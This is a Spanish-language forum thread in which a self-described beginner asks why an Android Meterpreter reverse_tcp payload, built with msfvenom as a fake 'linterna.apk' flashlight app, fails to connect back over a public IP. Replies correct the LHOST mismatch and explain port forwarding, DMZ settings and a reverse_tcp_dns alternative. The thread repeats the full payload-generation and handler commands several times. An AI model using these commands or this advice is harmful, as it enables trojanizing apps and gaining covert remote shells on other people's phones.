DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)

Iniciado por GreenTick, 16 Junio 2016, 17:36 PM

0 Miembros y 1 Visitante están viendo este tema.

GreenTick

Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citarmsfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
8Noobs - Más que una comunidad; una familia.
www.telegram.me/proyecto8NOOBS

Ser humilde, significa entender que algún día podrás ver al de arriba bajo tus pies; y al que te esta lamiendo las suelas saltando encima tuya.

eag1eO9

#1
reverse_tcp_dns

https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_dns

:o


eag1eO9

MOD EDIT: No hacer doble post.

windic

Primero decirte que te vendría bien buscar algún libro de redes de computadores o sobre IPv4.

IP publica --------------> rango de direcciones IPs asignadas por los ISP cuando se contrata un adsl. Este rango de direcciones son administradas por la IANA. Son direcciones únicas en todo el rango de Internet.

IP privada --------------> rango de direcciones IPs asignados a equipos en una red privada por convención son los rangos 10.0.0.0/8 , 172.16.0.0/12 , 192.168.0.0/16. (esta convención esta desfasada por lo que puedes usar cualquier dirección)

Por otra parte has de saber que para cualquier programa la importancia de si la IP usada es la publica o la privada es nula, ya que los programas no distinguen entre unos tipos de IPs (si distinguen entre IPv4 e IPv6) y otros. El único al que le importa esto es a la arquitectura de tu red. Por lo tanto abría que ver que red usas para conectarte a Internet.

Suponiendo que tu red es la típica con un router el cual tiene asignada una IP publica y una privada y hace la conversión mediante NAT. Entonces Deberás abrir los puertos de tu router haciendo un PAT a la dirección privada de tu ordenador y también deberás poner tu dirección privada en el DMZ del router.

msfvenom –p android/meterpreter/reverse_tcp LHOST=(*tu ip privada o publica) LPORT=(port)R > /root/linterna.apk

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (tu ip privada)
set LPORT (port)
exploit



*Usar tu ip privada para redes local, usar tu ip publica para funcionar a través de Internet

reyo

hola amigo muy buenas comprendo que seas principiante y por eso te ayudare ; )
ya que yo tambien se lo basico pero te explicare absolutamente TODO muy bien resumido y sin muchas complicaciones ;D

En primer lugar copiare tu codigo y lo restificare paso a paso:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


Lo que te resalte esta mal la primera escribiste mal la direccion ip de LHOST y asi no podra conectar, en segundo esa ruta es segun tu sistema yo e visto el video de donde la sacaste y ami esa ruta no me vale asi que pon tu una ruta de donde quieres ubicar el apk y por tercero y ultimo lugar es un consejo ;)
si lo llegas a usar en ip publica recuerda que tienes que activar los respectivos puertos en el router.
un saludo y espero que te haya ayudado.
EL MEJOR MAESTRO FUE DISCIPULO Y SI SOMOS DISCIPULOS LlEgArEmOs hA MaEsTrOs